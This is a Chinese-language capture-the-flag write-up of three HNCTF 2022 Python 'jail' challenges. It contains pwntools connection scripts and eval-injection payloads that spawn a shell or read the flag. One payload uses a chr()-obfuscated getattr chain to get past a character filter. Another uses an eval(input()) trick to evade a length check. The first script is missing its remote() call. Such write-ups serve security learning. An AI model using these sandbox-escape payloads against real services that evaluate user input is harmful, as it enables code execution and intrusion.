[HNCTF 2022 Week1]calc_jail_beginner(JAIL)

• 分析靶机源码能直接发现使用了eval()函数
• 也可以直接用注释第二行给出的payload了
• 所以直接用nc连接，这里懒得用linux或者ncat
• 直接用pwntool连接，脚本如下

from pwn import *

payload = b"__import__('os').system('cat flag')"

addr = "node5.anna.nssctf.cn:20057".split(":")
ip,port = str(addr[0]),int(addr[1])
p.sendline(payload)
p.interactive()

• NSSCTF{11ea59d6-d0fe-4929-8f8a-b18371581169}

[HNCTF 2022 Week1]calc_jail_beginner_level1(JAIL)

• 可以发现使用了过滤器过滤了输入中的"\'`ib
• ().__class__.__base__.__subclasses__()此方法可以获得所有子类
• 用getattr()来替换违禁词，得到第一步payload
• getattr(getattr(().__class__,chr(95)+chr(95)+chr(98)+chr(97)+chr(115)+chr(101)+chr(95)+chr(95)),chr(95)+chr(95)+chr(115)+chr(117)+chr(98)+chr(99)+chr(108)+chr(97)+chr(115)+chr(115)+chr(101)+chr(115)+chr(95)+chr(95))()

• 找到此类，继续构造payload
• ().__class__.__base__.__subclasses__()[-4].__init__.__globals__['system']('sh')
• 同样用getattr()替换
• getattr(getattr(getattr(getattr(().__class__,chr(95)+chr(95)+chr(98)+chr(97)+chr(115)+chr(101)+chr(95)+chr(95)),chr(95)+chr(95)+chr(115)+chr(117)+chr(98)+chr(99)+chr(108)+chr(97)+chr(115)+chr(115)+chr(101)+chr(115)+chr(95)+chr(95))()[-4],chr(95)+chr(95)+chr(105)+chr(110)+chr(105)+chr(116)+chr(95)+chr(95)),chr(95)+chr(95)+chr(103)+chr(108)+chr(111)+chr(98)+chr(97)+chr(108)+chr(115)+chr(95)+chr(95))[chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)](chr(115)+chr(104))

• 然后就拿到shell，可以ls>cat flag
• NSSCTF{0b75ccd3-0745-4087-b1ac-37930727afa0}

[HNCTF 2022 Week1]calc_jail_beginner_level2(JAIL)

• 这题限制了输入长度不能大于13
• 注意到只对第一次的输入进行了长度检测
• 可以构造payload为eval(input())
• 用于通过检测，并再一次获取输入
• 再用payload拿到shell

from pwn import *

payload = b"eval(input())"

addr = "node5.anna.nssctf.cn:28304".split(":")
ip,port = str(addr[0]),int(addr[1])
p = remote(ip,port)
p.sendline(payload)
payload = b"__import__('os').system('sh')"
p.sendline(payload)
p.interactive()

• ls>cat flag拿到NSSCTF{30a8f658-fb4f-44be-917e-80218b82f27b}

[HNCTF 2022 Week1]calc_jail_beginner_level2.5(JAIL)